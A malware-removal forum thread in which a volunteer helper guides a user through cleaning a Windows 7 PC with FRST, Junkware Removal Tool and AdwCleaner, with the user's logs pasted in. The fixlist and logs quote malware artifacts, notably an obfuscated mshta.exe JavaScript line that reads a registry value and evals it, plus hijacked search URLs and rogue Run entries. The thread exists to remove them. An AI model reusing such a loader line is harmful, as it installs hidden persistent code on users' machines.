If you wish to receive help from us, you must remove any and all of the following from your computer:

• Illegal software
• Cracked software
• Illegal software key generators

If you do not remove the software, your thread will be closed. You will need to post a new set of logs if you decide to remove the software.

[Khazard]

I assure you that those logs do not show any sort of cracked software, rather they are files for games that portray something in the game.

crack1.ped is an animation within a game, while streetcracks and wallcracks are, like their names suggest, cracks in walls and/or streets.

[pystryker]

I assure you that those logs do not show any sort of cracked software, rather they are files for games that portray something in the game.
crack1.ped is an animation within a game, while streetcracks and wallcracks are, like their names suggest, cracks in walls and/or streets.

Hello

Ok, thank you for explaining those files.
 

3dmgame-7.days.to.die.alpha.13.6.steam.edition.x64.cracked-3dm

What about this one?

[Khazard]

I uninstalled that quite a long time ago, and I think files related to it still remained.

[pystryker]

I uninstalled that quite a long time ago, and I think files related to it still remained.

Hello

Ok, I can remove those that show as we deal with the error that's popping up. Let's get started.


Please disable your antivirus for the duration of my instructions. Don't forget to re-enable it after you have completed the steps.

Step 1: P2P Warning

The Dangers of P2P Programs

I noticed that you have a P2P file sharing program on your computer . I cannot stress highly enough the danger in using these types of programs. P2P programs are one of the major avenues of infection these days. The files downloaded with these programs are more likely than not infected with trojans, malware, rootkits, etc.

You run the risk of getting an infection that can compromise your sensitive data, such as financial records, personal information, etc. That is just the infection aspect of using P2P programs. You also run the risk of possible arrest, fines, or in severe cases, jail time for illegal downloading of copyrighted material.

There are also new infections out there such as CryptoWall 3.0 and CryptoLocker. When infected with these, all of your personal files on any drive connected to your computer will be affected. These infections copy all your files, encrypt them, and then delete the originals, leaving you with the encrypted copies. You are then presented with a screen telling you you have a certain amount of time to pay the ransom for the decryption code to decrypt your files. Even if you pay the ransom, there decryption process usually results in corrupt and unusable files.

There is nothing we can do to decrypt the files, as they use very sophisticated encryption techniques. Please consider this when using P2P programs. Malware and ransomware writers use P2P to spread their infections.

I guarantee you, that if you continue to use file sharing programs, your machine will get infected again.


Here are some information sources about the dangers of P2P programs:

FBI - Peer to Peer Scams

USA Today Artticle on P2P Programs

File Sharing Infects 500,000 Computers

I very much recommend you uninstall this program from your machine. If not, I can guarantee you will be back needing help with your machine again. The risks of infections from content downloaded with P2P programs far outweigh any benefit of using them.

It is, of course, your choice as to whether or not you remove the program from your machine. It is my duty though, to point out how dangerous it is to use these programs. However, I must request that you do not use it while we are cleaning your machine.


Step 2: Fix with FRST

• Open notepad (Start =>All Programs => Accessories => Notepad). Please copy the entire contents of the code box below. (To do this highlight the contents of the box, right click on it and select copy.
• Right-click in the open notepad and select Paste).
• Save it on the desktop as fixlist.txt
  
  NOTE: It's important that both files, FRST/FRST64 and fixlist.txt are in the same location or the fix will not work.

Start
CreateRestorePoint:
CloseProcesses:
HKU\S-1-5-21-1988295413-3700943990-1798627009-1000\...\Run: [Etzption] => regsvr32.exe C:\Users\HP\AppData\Local\Etzption\kgnxycpl.dll <===== ATTENTION
HKU\S-1-5-21-1988295413-3700943990-1798627009-1000\...\MountPoints2: F - F:\Setup.exe
SearchScopes: HKLM-x32 -> DefaultScope value is missing
C:\Users\HP\AppData\Local\Etzption
StartMenuInternet: IEXPLORE.EXE - C:\Program Files (x86)\Internet Explorer\iexplore.exe hxxp://www.istartsurf.com/?type=sc&ts=1442127735&z=8f6c8bea7b47c1abc4c3a41g0z6z1o2g1o8m5wdm1b&from=cor&uid=WDCXWD5000LPVX-60V0TT0_WD-WX61AB404E2U04E2U
FF Plugin HKU\S-1-5-21-1988295413-3700943990-1798627009-1000: ubisoft.com/uplaypc -> C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\npuplaypc.dll [No File]
HKU\.DEFAULT\Software\Classes\23352ea4: "C:\Windows\system32\mshta.exe" "javascript:fX5Ma="nNrr";JA1=new ActiveXObject("WScript.Shell");CSc4J="v9eFQB";o3BHJ5=JA1.RegRead("HKCU\\software\\uafzn\\pasf");Gb9xLXb="36Ad";eval(o3BHJ5);lnG1a="d";" <===== ATTENTION
AlternateDataStreams: C:\ProgramData:NT [40]
AlternateDataStreams: C:\ProgramData:NT2 [344]
AlternateDataStreams: C:\Users\All Users:NT [40]
AlternateDataStreams: C:\Users\All Users:NT2 [344]
AlternateDataStreams: C:\ProgramData\Application Data:NT [40]
AlternateDataStreams: C:\ProgramData\Application Data:NT2 [344]
AlternateDataStreams: C:\Users\HP\Application Data:NT [40]
AlternateDataStreams: C:\Users\HP\Application Data:NT2 [344]
AlternateDataStreams: C:\Users\HP\AppData\Roaming:NT [40]
AlternateDataStreams: C:\Users\HP\AppData\Roaming:NT2 [344]
FirewallRules: [TCP Query User{EC646AD1-5D56-41D2-926F-C12EA6261B6F}C:\users\hp\downloads\3dmgame-7.days.to.die.alpha.13.6.steam.edition.x64.cracked-3dm\3dmgame-7.days.to.die.alpha.13.6.steam.edition.x64.cracked-3dm\7 days to die\7daystodie.exe] => (Allow) C:\users\hp\downloads\3dmgame-7.days.to.die.alpha.13.6.steam.edition.x64.cracked-3dm\3dmgame-7.days.to.die.alpha.13.6.steam.edition.x64.cracked-3dm\7 days to die\7daystodie.exe
FirewallRules: [UDP Query User{17D0503A-5B06-4918-A320-CB58C49EC9F5}C:\users\hp\downloads\3dmgame-7.days.to.die.alpha.13.6.steam.edition.x64.cracked-3dm\3dmgame-7.days.to.die.alpha.13.6.steam.edition.x64.cracked-3dm\7 days to die\7daystodie.exe] => (Allow) C:\users\hp\downloads\3dmgame-7.days.to.die.alpha.13.6.steam.edition.x64.cracked-3dm\3dmgame-7.days.to.die.alpha.13.6.steam.edition.x64.cracked-3dm\7 days to die\7daystodie.exe
CMD: netsh advfirewall reset
CMD: netsh advfirewall set allprofiles state on
CMD: ipconfig /flushdns
CMD: bitsadmin /reset /allusers
Emptytemp:
End

NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system.


Run FRST and press the Fix button just once and wait. The tool will make a log on the desktop (Fixlog.txt) please post it in your next reply.


Step 3: Junkware Removal Tool

Please download Junkware Removal Tool to your desktop.

• Shut down your protection software now to avoid potential conflicts.
• Run the tool by double-clicking it. If you are using Windows Vista, 7, or 8; instead of double-clicking, right-mouse click JRT.exe and select "Run as Administrator".
• The tool will open and start scanning your system.
• Please be patient as this can take a while to complete depending on your system's specifications.
• On completion, a log (JRT.txt) is saved to your desktop and will automatically open.
• Post the contents of JRT.txt into your next message.

Step 4: AdwCleaner

Download ADWcleaner by clicking here. Please save it to your Desktop

• Double click (Vista and 7 Users)right click the adwcleaner.exe file and click Run as Adminstrator and accept the UAC prompt to run AdwCleaner
• Once AdwCleaner's control panel is open and it says "Waiting for Action", click on Options at the top of the control panel.
• Please Check the following options:
  • Reset Proxy Settings
  • Reset Winsock Settings
  • Reset TCP/IP Settings
  • Reset Firewall Settings
  • Reset IPSec Settings
  • Reset BITS Queue
  • Reset Internet Explorer Policies
  • Reset Chrome Policies
• Close any open windows or browsers.
• Pause your Anti-Virus program if it is running.
• Once it starts, click on the Scan button.
• Let the scan complete itself. This may take a few minutes.
• Once the scan has finished, it will say "Pending, uncheck elements you don't want to remove.", don't worry about unchecking anything and then click the Cleaning button. When finished, it will ask to reboot. Please reboot.
• When the machine has rebooted, a log will be produced. Please copy/paste that in your next reply. Here's how:
  • Click the Logfile button and the log will open. Copy and Paste the contents of the log file into your next reply.
  This report is also saved at C:\Adwcleaner

Step 5: Fresh FRST Logs

• Start Farbar's Recovery Scan Tool, place a check in the Addition.txt box and press the Scan button.
• FRST will scan your system and produce two logs: FRST.txt and Addition.txt. Please post them in your next reply.

Things I need to see in your next post:

Please post each of these logs as a separate reply in this thread.

Fixlog.txt Log
Junkware Removal Tool Log
AdwCleaner Log
Fresh FRST.txt Log
Fresh Addition.txt Log

[Khazard]

When I try to scan with AdwCleaner it says "*sqlite3.dll is corrupted or has been replaced"

[pystryker]

When I try to scan with AdwCleaner it says "*sqlite3.dll is corrupted or has been replaced"

Hello

Please uninstall AdwCleaner and download a new copy from the link in the instructions.

[Khazard]

Problem still persists, re-installed and everything, but still the same error

[pystryker]

Problem still persists, re-installed and everything, but still the same error

Hello

Please uninstall the current copy and download a new one from this link. If the problem persists after trying it from this link, please skip to the next step.

https://toolslib.net...d/1-adwcleaner/

[Khazard]

I deleted the initial fixlog.txt by mistake

Here's the second fixlog.txt

Spoiler

Fix result of Farbar Recovery Scan Tool (x64) Version: 23-04-2017 01

Ran by HP (23-04-2017 16:52:11) Run:2

Running from C:\Users\HP\Desktop

Loaded Profiles: HP (Available Profiles: HP)

Boot Mode: Normal

==============================================

 

fixlist content:

*****************

Start

CreateRestorePoint:

CloseProcesses:

HKU\S-1-5-21-1988295413-3700943990-1798627009-1000\...\Run: [Etzption] => regsvr32.exe C:\Users\HP\AppData\Local\Etzption\kgnxycpl.dll <===== ATTENTION

HKU\S-1-5-21-1988295413-3700943990-1798627009-1000\...\MountPoints2: F - F:\Setup.exe

SearchScopes: HKLM-x32 -> DefaultScope value is missing

C:\Users\HP\AppData\Local\Etzption

StartMenuInternet: IEXPLORE.EXE - C:\Program Files (x86)\Internet Explorer\iexplore.exe hxxp://www.istartsurf.com/?type=sc&ts=1442127735&z=8f6c8bea7b47c1abc4c3a41g0z6z1o2g1o8m5wdm1b&from=cor&uid=WDCXWD5000LPVX-60V0TT0_WD-WX61AB404E2U04E2U

FF Plugin HKU\S-1-5-21-1988295413-3700943990-1798627009-1000: ubisoft.com/uplaypc -> C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\npuplaypc.dll [No File]

HKU\.DEFAULT\Software\Classes\23352ea4: "C:\Windows\system32\mshta.exe" "javascript:fX5Ma="nNrr";JA1=new ActiveXObject("WScript.Shell");CSc4J="v9eFQB";o3BHJ5=JA1.RegRead("HKCU\\software\\uafzn\\pasf");Gb9xLXb="36Ad";eval(o3BHJ5);lnG1a="d";" <===== ATTENTION

AlternateDataStreams: C:\ProgramData:NT [40]

AlternateDataStreams: C:\ProgramData:NT2 [344]

AlternateDataStreams: C:\Users\All Users:NT [40]

AlternateDataStreams: C:\Users\All Users:NT2 [344]

AlternateDataStreams: C:\ProgramData\Application Data:NT [40]

AlternateDataStreams: C:\ProgramData\Application Data:NT2 [344]

AlternateDataStreams: C:\Users\HP\Application Data:NT [40]

AlternateDataStreams: C:\Users\HP\Application Data:NT2 [344]

AlternateDataStreams: C:\Users\HP\AppData\Roaming:NT [40]

AlternateDataStreams: C:\Users\HP\AppData\Roaming:NT2 [344]

FirewallRules: [TCP Query User{EC646AD1-5D56-41D2-926F-C12EA6261B6F}C:\users\hp\downloads\3dmgame-7.days.to.die.alpha.13.6.steam.edition.x64.cracked-3dm\3dmgame-7.days.to.die.alpha.13.6.steam.edition.x64.cracked-3dm\7 days to die\7daystodie.exe] => (Allow) C:\users\hp\downloads\3dmgame-7.days.to.die.alpha.13.6.steam.edition.x64.cracked-3dm\3dmgame-7.days.to.die.alpha.13.6.steam.edition.x64.cracked-3dm\7 days to die\7daystodie.exe

FirewallRules: [UDP Query User{17D0503A-5B06-4918-A320-CB58C49EC9F5}C:\users\hp\downloads\3dmgame-7.days.to.die.alpha.13.6.steam.edition.x64.cracked-3dm\3dmgame-7.days.to.die.alpha.13.6.steam.edition.x64.cracked-3dm\7 days to die\7daystodie.exe] => (Allow) C:\users\hp\downloads\3dmgame-7.days.to.die.alpha.13.6.steam.edition.x64.cracked-3dm\3dmgame-7.days.to.die.alpha.13.6.steam.edition.x64.cracked-3dm\7 days to die\7daystodie.exe

CMD: netsh advfirewall reset

CMD: netsh advfirewall set allprofiles state on

CMD: ipconfig /flushdns

CMD: bitsadmin /reset /allusers

Emptytemp:

End

*****************

 

Restore point was successfully created.

Processes closed successfully.

HKU\S-1-5-21-1988295413-3700943990-1798627009-1000\Software\Microsoft\Windows\CurrentVersion\Run\\Etzption => value not found.

HKU\S-1-5-21-1988295413-3700943990-1798627009-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\F => key removed successfully

HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value restored successfully

"C:\Users\HP\AppData\Local\Etzption" => not found.

HKLM\SOFTWARE\Clients\StartMenuInternet\IEXPLORE.EXE\shell\open\command\\Default => value restored successfully

HKU\S-1-5-21-1988295413-3700943990-1798627009-1000\Software\MozillaPlugins\ubisoft.com/uplaypc => key not found. 

C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\npuplaypc.dll => not found.

HKU\.DEFAULT\Software\Classes\23352ea4 => key not found. 

"C:\ProgramData" => ":NT" ADS not found.

"C:\ProgramData" => ":NT2" ADS not found.

"C:\Users\All Users" => ":NT" ADS not found.

"C:\Users\All Users" => ":NT2" ADS not found.

"C:\ProgramData\Application Data" => ":NT" ADS not found.

"C:\ProgramData\Application Data" => ":NT2" ADS not found.

"C:\Users\HP\Application Data" => ":NT" ADS not found.

"C:\Users\HP\Application Data" => ":NT2" ADS not found.

"C:\Users\HP\AppData\Roaming" => ":NT" ADS not found.

"C:\Users\HP\AppData\Roaming" => ":NT2" ADS not found.

HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\TCP Query User{EC646AD1-5D56-41D2-926F-C12EA6261B6F}C:\users\hp\downloads\3dmgame-7.days.to.die.alpha.13.6.steam.edition.x64.cracked-3dm\3dmgame-7.days.to.die.alpha.13.6.steam.edition.x64.cracked-3dm\7 days to die\7daystodie.exe => value not found.

HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\UDP Query User{17D0503A-5B06-4918-A320-CB58C49EC9F5}C:\users\hp\downloads\3dmgame-7.days.to.die.alpha.13.6.steam.edition.x64.cracked-3dm\3dmgame-7.days.to.die.alpha.13.6.steam.edition.x64.cracked-3dm\7 days to die\7daystodie.exe => value not found.

 

========= netsh advfirewall reset =========

 

Ok.

 

 

========= End of CMD: =========

 

 

========= netsh advfirewall set allprofiles state on =========

 

Ok.

 

 

========= End of CMD: =========

 

 

========= ipconfig /flushdns =========

 

 

Windows IP Configuration

 

Successfully flushed the DNS Resolver Cache.

 

========= End of CMD: =========

 

 

========= bitsadmin /reset /allusers =========

 

 

BITSADMIN version 3.0 [ 7.5.7600 ]

BITS administration utility.

© Copyright 2000-2006 Microsoft Corp.

 

BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows.

Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets.

 

0 out of 0 jobs canceled.

 

========= End of CMD: =========

 

 

=========== EmptyTemp: ==========

 

BITS transfer queue => 8388608 B

DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 5919827 B

Java, Flash, Steam htmlcache => 131072 B

Windows/system/drivers => 2776 B

Edge => 0 B

Chrome => 644110858 B

Firefox => 0 B

Opera => 0 B

 

Temp, IE cache, history, cookies, recent:

Users => 0 B

Default => 0 B

Public => 0 B

ProgramData => 0 B

systemprofile => 692 B

systemprofile32 => 0 B

LocalService => 66228 B

NetworkService => 11794 B

HP => 297521 B

 

RecycleBin => 0 B

EmptyTemp: => 628.4 MB temporary data Removed.

 

================================

 

 

The system needed a reboot.

 

==== End of Fixlog 16:52:49 ====

 

JRT log:

Spoiler

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Junkware Removal Tool (JRT) by Malwarebytes

Version: 8.1.3 (04.10.2017)

Operating System: Windows 7 Professional x64 

Ran by HP (Administrator) on 23/04/2017 at 16:57:46.19

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

 

 

 

 

File System: 10 

 

Successfully deleted: C:\Users\HP\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\2AKCM312 (Temporary Internet Files Folder) 

Successfully deleted: C:\Users\HP\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\3PUK8O1F (Temporary Internet Files Folder) 

Successfully deleted: C:\Users\HP\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\CW43C6AD (Temporary Internet Files Folder) 

Successfully deleted: C:\Users\HP\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EWM638MX (Temporary Internet Files Folder) 

Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\2AKCM312 (Temporary Internet Files Folder) 

Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\3PUK8O1F (Temporary Internet Files Folder) 

Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\CW43C6AD (Temporary Internet Files Folder) 

Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EWM638MX (Temporary Internet Files Folder) 

Successfully repaired: C:\Users\HP\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk (Shortcut)

Successfully repaired: C:\Users\HP\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk (Shortcut)

 

 

 

Registry: 0 

 

 

 

 

 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Scan was completed on 23/04/2017 at 17:01:12.15

End of JRT log

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

 

Fresh FRST

Spoiler

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 23-04-2017 01

Ran by HP (administrator) on HP-PC (23-04-2017 17:02:46)

Running from C:\Users\HP\Desktop\ad

Loaded Profiles: HP (Available Profiles: HP)

Platform: Windows 7 Professional (X64) Language: English (United States)

Internet Explorer Version 8 (Default browser: Chrome)

Boot Mode: Normal

Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/

 

==================== Processes (Whitelisted) =================

 

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

 

(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MsMpEng.exe

(Intel Corporation) C:\Windows\System32\igfxCUIService.exe

(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.33.3\GoogleCrashHandler.exe

(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.33.3\GoogleCrashHandler64.exe

() C:\ProgramData\Logic Cramble\set.exe

(Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe

(Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe

(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE

(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE

(Microsoft Corporation) C:\Program Files\Microsoft Security Client\NisSrv.exe

(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe

(Microsoft Corporation) C:\Program Files\Microsoft Security Client\msseces.exe

(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

(Microsoft Corporation) C:\Windows\System32\dllhost.exe

(Microsoft Corporation) C:\Windows\System32\dllhost.exe

 

==================== Registry (Whitelisted) ====================

 

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

 

HKLM\...\Run: [MSC] => C:\Program Files\Microsoft Security Client\msseces.exe [1337000 2015-04-30] (Microsoft Corporation)

HKLM-x32\...\Run: [Lightshot] => C:\Program Files (x86)\Skillbrains\lightshot\Lightshot.exe [226560 2014-10-16] ()

HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [587288 2016-09-22] (Oracle Corporation)

HKU\S-1-5-21-1988295413-3700943990-1798627009-1000\...\Run: [Skype] => C:\Program Files (x86)\Skype\Phone\Skype.exe [55357464 2015-09-04] (Skype Technologies S.A.)

HKU\S-1-5-21-1988295413-3700943990-1798627009-1000\...\Run: [uTorrent] => C:\Users\HP\AppData\Roaming\uTorrent\uTorrent.exe [2147520 2017-03-14] (BitTorrent Inc.)

HKU\S-1-5-21-1988295413-3700943990-1798627009-1000\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [3019552 2017-03-23] (Valve Corporation)

HKU\S-1-5-21-1988295413-3700943990-1798627009-1000\...\Run: [RGSC] => C:\Program Files (x86)\Rockstar Games\Rockstar Games Social Club\RGSCLauncher.exe /silent

HKU\S-1-5-21-1988295413-3700943990-1798627009-1000\...\Run: [Discord] => C:\Users\HP\AppData\Local\Discord\app-0.0.297\Discord.exe

HKU\S-1-5-21-1988295413-3700943990-1798627009-1000\...\Run: [Ibhssoft] => C:\Users\HP\AppData\Local\Ibhssoft\s0gbs4.exe

HKU\S-1-5-18\...\Run: [oALSusVMb8.exe] => C:\Program Files\MSBuild\TFEMS13WF30E\oALSusVMb8.exe [444928 2017-04-21] (tachba3)

AppInit_DLLs: C:\ProgramData\Affenpinscher\Homelux.dll => No File

AppInit_DLLs-x32: C:\ProgramData\Affenpinscher\Soltough.dll => No File

 

==================== Internet (Whitelisted) ====================

 

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

 

Tcpip\Parameters: [DhcpNameServer] 41.212.0.100 41.212.0.101

Tcpip\..\Interfaces\{4ED56D3C-8DAE-4F80-93CC-907F3CAC181A}: [NameServer] 8.8.8.8,8.8.4.4

Tcpip\..\Interfaces\{4ED56D3C-8DAE-4F80-93CC-907F3CAC181A}: [DhcpNameServer] 41.212.0.100 41.212.0.101

Tcpip\..\Interfaces\{7E37DC77-5ECC-4B66-8019-685EFD3768FB}: [DhcpNameServer] 41.212.0.100 41.212.0.101

 

Internet Explorer:

==================

HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = 

HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = 

HKU\S-1-5-21-1988295413-3700943990-1798627009-1000\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://www.msn.com/?ocid=iehp

SearchScopes: HKLM-x32 -> ielnksrch URL = hxxps://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBUTxkij9_BxXqKONdz_l55SXbUBFaelXxQ6FYsEP8nGn0cy4u6BOH71F9xR_w45AKw8gaDhEAj0LFaN3Kqh8UdHeeG6jTZeW8RUC3MkT1gOVv1DgX0h74xO7Dz57gF30ynKTYvoxPKTwS8A6jBoGa8yHD462_8H0g4a-7jotn74N311gyUOFA,&q={searchTerms}

SearchScopes: HKU\S-1-5-21-1988295413-3700943990-1798627009-1000 -> DefaultScope {ielnksrch} URL = hxxps://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBUTxkij9_BxXqKONdz_l55SXbUBFaelXxQ6FYsEP8nGn0cy4u6BOH71F9xR_w45AKw8gaDhEAj0LFaN3Kqh8UdHeeG6jTZeW8RUC3MkT1gOVv1DgX0h74xO7Dz57gF30ynKTYvoxPKTwS8A6jBoGa8yHD462_8H0g4a-7jotn74N311gyUOFA,&q={searchTerms}

SearchScopes: HKU\S-1-5-21-1988295413-3700943990-1798627009-1000 -> {ielnksrch} URL = hxxps://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBUTxkij9_BxXqKONdz_l55SXbUBFaelXxQ6FYsEP8nGn0cy4u6BOH71F9xR_w45AKw8gaDhEAj0LFaN3Kqh8UdHeeG6jTZeW8RUC3MkT1gOVv1DgX0h74xO7Dz57gF30ynKTYvoxPKTwS8A6jBoGa8yHD462_8H0g4a-7jotn74N311gyUOFA,&q={searchTerms}

BHO: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\Office15\OCHelper.dll [2012-10-01] (Microsoft Corporation)

BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2012-07-17] (Microsoft Corp.)

BHO: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2016-01-08] (Microsoft Corporation)

BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office15\URLREDIR.DLL [2012-10-01] (Microsoft Corporation)

BHO: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office\Office15\GROOVEEX.DLL [2012-10-01] (Microsoft Corporation)

BHO-x32: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\Office15\OCHelper.dll [2012-10-01] (Microsoft Corporation)

BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_111\bin\ssv.dll [2016-10-22] (Oracle Corporation)

BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2012-07-17] (Microsoft Corp.)

BHO-x32: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2016-01-08] (Microsoft Corporation)

BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office15\URLREDIR.DLL [2012-10-01] (Microsoft Corporation)

BHO-x32: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\Office15\GROOVEEX.DLL [2012-10-01] (Microsoft Corporation)

BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_111\bin\jp2ssv.dll [2016-10-22] (Oracle Corporation)

Handler: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2016-01-08] (Microsoft Corporation)

Handler-x32: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2016-01-08] (Microsoft Corporation)

Filter: deflate - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\system32\urlmon.dll [2009-07-14] (Microsoft Corporation)

Filter-x32: deflate - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\SysWOW64\urlmon.dll [2009-07-14] (Microsoft Corporation)

Filter: gzip - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\system32\urlmon.dll [2009-07-14] (Microsoft Corporation)

Filter-x32: gzip - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\SysWOW64\urlmon.dll [2009-07-14] (Microsoft Corporation)

 

FireFox:

========

FF DefaultProfile: 48lgjav6.default

FF ProfilePath: C:\Users\HP\AppData\Roaming\Mozilla\Firefox\Profiles\48lgjav6.default [2017-04-23]

FF Homepage: Mozilla\Firefox\Profiles\48lgjav6.default -> C:\ProgramData\Affenpinschers\ff.HP

FF NewTab: Mozilla\Firefox\Profiles\48lgjav6.default -> C:\ProgramData\Affenpinschers\ff.NT

FF Extension: (System.Runtime.InteropServices.ComRegisterFunctionAttribute) - C:\Users\HP\AppData\Roaming\Mozilla\Firefox\Profiles\48lgjav6.default\Extensions\{63086783-BD70-059F-3F70-5CF11841DE4D} [2017-04-21] [not signed]

FF SearchPlugin: C:\Users\HP\AppData\Roaming\Mozilla\Firefox\Profiles\48lgjav6.default\searchplugins\findit.xml [2017-04-23]

FF Plugin-x32: @java.com/DTPlugin,version=11.111.2 -> C:\Program Files (x86)\Java\jre1.8.0_111\bin\dtplugin\npDeployJava1.dll [2016-10-22] (Oracle Corporation)

FF Plugin-x32: @java.com/JavaPlugin,version=11.111.2 -> C:\Program Files (x86)\Java\jre1.8.0_111\bin\plugin2\npjp2.dll [2016-10-22] (Oracle Corporation)

FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [No File]

FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office15\NPSPWRAP.DLL [2012-10-01] (Microsoft Corporation)

